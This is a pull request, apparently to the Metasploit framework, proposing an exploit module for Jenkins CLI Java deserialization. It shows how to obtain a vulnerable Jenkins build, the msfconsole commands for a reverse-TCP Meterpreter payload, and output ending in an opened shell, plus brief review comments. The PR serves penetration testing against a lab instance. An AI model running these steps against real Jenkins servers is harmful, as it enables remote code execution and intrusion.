### PR TITLE
Add Jenkins CLI Java serialization exploit module

### PR DESCRIPTION
**Pull request by dmohanty-r7**
This module exploits Jenkins CLI's serialization of the InvocationHandler object found in Apache Commons Collections library.

It first does a check via http to determine the port the CLI is running on. It then sends unsafe serialized objects to the CLI to first write a Java Meterpreter Payload to the Jenkins filesystem, then class load the payload.

Credits to @lsato-r7, @wvu-r7, @jvazquez-r7, and @wchen-r7  
# Verification
- [ ] Standup a Jenkins server version 1.637 or lower:

```
wget http://mirrors.jenkins-ci.org/war/1.637/jenkins.war
java -jar jenkins.war
```
- [ ] Run the following exploit in msfconsole:

```
use exploit/multi/jenkins/java_deserialize
set payload java/meterpreter/reverse_tcp
set RHOST 127.0.0.1
set RPORT 8080
set LHOST <UR-HOST>
set LPORT 4444
exploit
```
- [ ] Ensure you get a shell

```
resource (/Users/dmohanty/.msf4/msfconsole.rc)> use exploit/multi/jenkins/java_deserialize
resource (/Users/dmohanty/.msf4/msfconsole.rc)> set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
resource (/Users/dmohanty/.msf4/msfconsole.rc)> set RHOST 127.0.0.1
RHOST => 127.0.0.1
resource (/Users/dmohanty/.msf4/msfconsole.rc)> set RPORT 8080
RPORT => 8080
resource (/Users/dmohanty/.msf4/msfconsole.rc)> set LHOST AUS-MBP-1160.local
LHOST => AUS-MBP-1160.local
resource (/Users/dmohanty/.msf4/msfconsole.rc)> set LPORT 4444
LPORT => 4444
resource (/Users/dmohanty/.msf4/msfconsole.rc)> exploit
[*] Started reverse handler on 10.6.255.203:4444
[*] 127.0.0.1:8080 - Sending headers...
[*] 127.0.0.1:8080 - Sending payload length: 13202
[*] 127.0.0.1:8080 - Sending headers...
[*] 127.0.0.1:8080 - Sending payload length: 6770
[*] Sending stage (45741 bytes) to 10.6.255.203

meterpreter >
```

### CODE REVIEW

**Comment by wvu-r7** [comment]
Resolves #6332.

**Comment by wvu-r7** [comment]
@dmohanty-r7: Only modules should be under ```modules```. Maybe you want ```data```?

File: modules/exploits/multi/jenkins/java_deserialize.rb [hunk 1]
```diff
@@ -0,0 +1,191 @@
...
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        => [
+         ['Jenkins 1.637', {}]
+      ],
+      'DisclosureDate' => '',
+      'DefaultTarget' => 0))
+
+    register_options([
+      Opt::RHOST('127.0.0.1'),
```
Comment (void-in) [inline modules/exploits/multi/jenkins/java_deserialize.rb]: Localhost?

**Comment by wchen-r7** [comment]
I'll clean up.

File: modules/exploits/multi/jenkins/java_deserialize.rb (hunk 1 above)
Comment (wvu-r7) [inline modules/exploits/multi/jenkins/java_deserialize.rb]: localtoast

**Pull request closed without merging**